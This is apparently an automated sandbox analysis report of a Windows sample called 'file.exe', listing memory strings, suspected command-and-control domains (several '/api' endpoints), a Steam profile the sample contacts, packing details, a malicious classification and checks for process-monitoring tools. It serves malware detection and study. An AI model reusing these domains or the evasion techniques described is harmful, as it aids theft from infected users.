    Source: file.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptacul
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: file.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000002.1972650341.0000000000D3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dissapoiznw.store:443/api
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000003.1808609124.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820309604.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972941186.0000000000D73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://licendfilteo.site/api
    Source: file.exe, 00000000.00000002.1972941186.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820309604.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000000.00000003.1808609124.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820309604.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972941186.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000000.00000003.1820309604.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972941186.0000000000D73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiF
    Source: file.exe, 00000000.00000002.1972941186.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820309604.0000000000D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/k
    Source: file.exe, 00000000.00000003.1820309604.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972941186.0000000000D73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/ll
    Source: file.exe, 00000000.00000002.1972650341.0000000000D3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
    Source: file.exe, 00000000.00000002.1972650341.0000000000D3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spirittunek.store:443/apii%
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.1808609124.0000000000D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/N
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000002.1972650341.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000002.1972650341.0000000000D35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000002.1972650341.0000000000D35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory
    Source: file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000002.1972650341.0000000000D3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.1808609124.0000000000D55000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: file.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/
    Source: file.exe, 00000000.00000003.1808609124.0000000000D55000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972650341.0000000000D53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.4:49732 version: TLS 1.2

    System Summary

    barindex
    PE file contains section with special chars
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003502280_2_00350228
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003520300_2_00352030
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0037E8A00_2_0037E8A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038A0D00_2_0038A0D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003451600_2_00345160
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034E1A00_2_0034E1A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00384A400_2_00384A40
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034A3000_2_0034A300
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036C4700_2_0036C470
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00347CA40_2_00347CA4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035049B0_2_0035049B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003544870_2_00354487
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036CCD00_2_0036CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036FD100_2_0036FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003435B00_2_003435B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035C5F00_2_0035C5F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034BEB00_2_0034BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00356EBF0_2_00356EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034AF100_2_0034AF10
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 0035D300 appears 47 times
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 1904
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9995874587458746
    Source: classification engineClassification label: mal100.troj.evad.winEXE@3/5@10/2
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6848
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\20abe521-0f74-4882-867a-cd6e9158e72cJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeReversingLabs: Detection: 34%
    Source: file.exeVirustotal: Detection: 43%
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 1904
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 1896
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: file.exeStatic file information: File size 2952192 > 1048576
    Source: file.exeStatic PE information: Raw size of knvbsjee is bigger than: 0x100000 < 0x2a7600

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.340000.0.unpack :EW;.rsrc :W;.idata :W;knvbsjee:EW;blpyabbn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;knvbsjee:EW;blpyabbn:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x2dfc87 should be: 0x2dc33e
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name: knvbsjee
    Source: file.exeStatic PE information: section name: blpyabbn
    Source: file.exeStatic PE information: section name: .taggant
    Source: file.exeStatic PE information: section name: entropy: 7.984995408266034

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
